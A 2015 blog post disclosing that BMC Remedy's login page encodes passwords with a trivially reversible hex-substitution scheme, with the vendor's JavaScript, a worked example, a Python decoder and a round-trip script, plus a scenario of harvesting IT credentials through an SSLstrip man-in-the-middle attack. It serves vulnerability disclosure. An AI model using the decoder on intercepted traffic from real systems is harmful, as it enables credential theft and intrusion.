Local Tech Repair: Remedy 7.x, 8.x and possibly 9.x login password decoder

Friday, September 11, 2015

Remedy 7.x, 8.x and possibly 9.x login password decoder

So recently I have been doing some QA for a BMC Remedy product that my employer is starting to work with. One thing I noticed right away is that the cipher they use is extremely weak and basically plain text.


So here is how it works. When you sign in on the login page of a Remedy product, a piece of JavaScript encodes the password field into ciphered text before it is sent. BMC suggests always using HTTPS with their products to keep the login secure, though HTTPS is disabled by default. You can find more in their general security guidelines here: https://docs.bmc.com/docs/display/public/ars81/General+security+guidelines

Here is the JavaScript cipher that is used in their products.

function getScrambledPassword(pwd) {
    // 16-symbol substitution table, indexed 0..15
    var cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm'];
    var result = "";
    if (pwd == null)
        pwd = "";
    // percent-encode first, so every remaining char code is below 128
    pwd = encodeURIComponent(pwd);
    //alert("encoded password: " + pwd);
    for (var i = 0; i < pwd.length; i++) {
        var cc = pwd.charCodeAt(i);
        // high nibble (floor(cc/16)) then low nibble (cc%16), each mapped through the table
        result += cipher[Math.floor(cc / 16)] + cipher[cc % 16];
    }
    //alert("scrambled password: " + result);
    return result;
}



What this code does is take the entered password, run it through encodeURIComponent, break the result down into character codes, and then feed each code through a little arithmetic. For instance:
input: @
encodeURIComponent gives: %40
the character codes of the three encoded characters are 37 52 48
for each code, two cipher symbols are calculated and picked
the first pass uses 37
Math.floor(37/16) = 2
cipher[2] is z
then it appends cipher[37 mod 16], and 37 mod 16 = 5
cipher[5] is b
so the first encoded character gives us zb
the same is repeated for the next two encoded characters (52 gives hx, 48 gives hk)
this gives us the encoding
zbhxhk



So for decoding this means two things: because the division rounds down, the first symbol alone cannot give us the exact char code, but because they also take the remainder (mod 16) for the second symbol, the two symbols together recover it exactly (cc = 16 * floor(cc/16) + cc mod 16). No key is involved at all.


So here is a PoC Python decoder for the Remedy cipher (Python 3).

import sys
from urllib.parse import unquote

print("Welcome to the BMC Remedy password decoder")
password = input('Enter Password hash: ').strip()
cipher = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm']
# every original character became exactly two symbols
if len(password) % 2 != 0:
    sys.exit("Scrambled text must have an even number of symbols")
decryptedpass = ""
num = 0
while num < len(password):
    # first symbol of the pair holds floor(cc/16), the high nibble
    ciphernum = cipher.index(password[num])
    encodednum = ciphernum * 16
    num = num + 1
    # second symbol holds cc % 16, the low nibble
    ciphernum = cipher.index(password[num])
    encodednum += ciphernum
    decryptedpass += chr(encodednum)
    num = num + 1
# undo the encodeURIComponent() step
print(unquote(decryptedpass))
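To check both directions, here is an added Python 3 round-trip of the scrambler and its inverse (example code written for this post, not BMC's code). It shows that the scheme is just hex with a renamed 16-letter alphabet: the pair of symbols always recovers the exact char code, so any copy of the scrambled value is the password. The sample passwords are constructed; the quote() safe set is chosen to match what encodeURIComponent leaves unescaped.

```python
from urllib.parse import quote, unquote

# The 16-symbol substitution table from getScrambledPassword().
CIPHER = ['k', 's', 'z', 'h', 'x', 'b', 'p', 'j', 'v', 'c', 'g', 'f', 'q', 'n', 't', 'm']
# Reverse lookup: symbol -> nibble value (0..15).
NIBBLE = {sym: val for val, sym in enumerate(CIPHER)}


def scramble(pwd: str) -> str:
    """Port of the login page's scrambler.

    encodeURIComponent() leaves only A-Z a-z 0-9 - _ . ! ~ * ' ( )
    unescaped; quote() with this safe set behaves the same (both emit
    UTF-8 percent escapes), so every remaining char code is below 128.
    """
    encoded = quote(pwd or "", safe="!*'()")
    out = []
    for ch in encoded:
        cc = ord(ch)
        # cc == 16 * (cc // 16) + cc % 16, so the two lookups are the
        # high and low hex digit of cc; the floor loses nothing.
        out.append(CIPHER[cc // 16] + CIPHER[cc % 16])
    return "".join(out)


def unscramble(scrambled: str) -> str:
    """Inverse of scramble(); raises ValueError on malformed input."""
    if len(scrambled) % 2:
        raise ValueError("scrambled text must have an even length")
    chars = []
    for hi, lo in zip(scrambled[::2], scrambled[1::2]):
        if hi not in NIBBLE or lo not in NIBBLE:
            raise ValueError(f"symbol outside the 16-letter table: {hi}{lo}")
        chars.append(chr(NIBBLE[hi] * 16 + NIBBLE[lo]))
    # undo the percent-encoding (UTF-8, like encodeURIComponent)
    return unquote("".join(chars))


if __name__ == "__main__":
    # constructed sample passwords, including a space, symbols and non-ASCII
    for pwd in ["@", "P@ss w0rd!", "pässwörd"]:
        s = scramble(pwd)
        print(f"{pwd!r} -> {s} -> {unscramble(s)!r}")
```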


What this means as an attack vector:

Within many organizations, users are very used to clicking through an HTTPS certificate warning, because people generally assume the company is keeping them safe.

If an attacker gets into an organization and then performs a MitM attack using SSLstrip, the attacker could gather the credentials of all, or at least some, of the IT users. This would greatly increase the speed at which the attacker penetrates the organization.

If you use Remedy, please ask the vendor to fix this issue. It has been known for some time and has been written up elsewhere going back years, yet it still has not been fixed. For example:
http://rewtdance.blogspot.com/2012/05/bmc-remedy-password-descrambling.html
http://myitpath.blogspot.com/2010/09/reversing-remedy-passwords.html

are two that show up on the first page of search results.


- Local Tech Repair Admin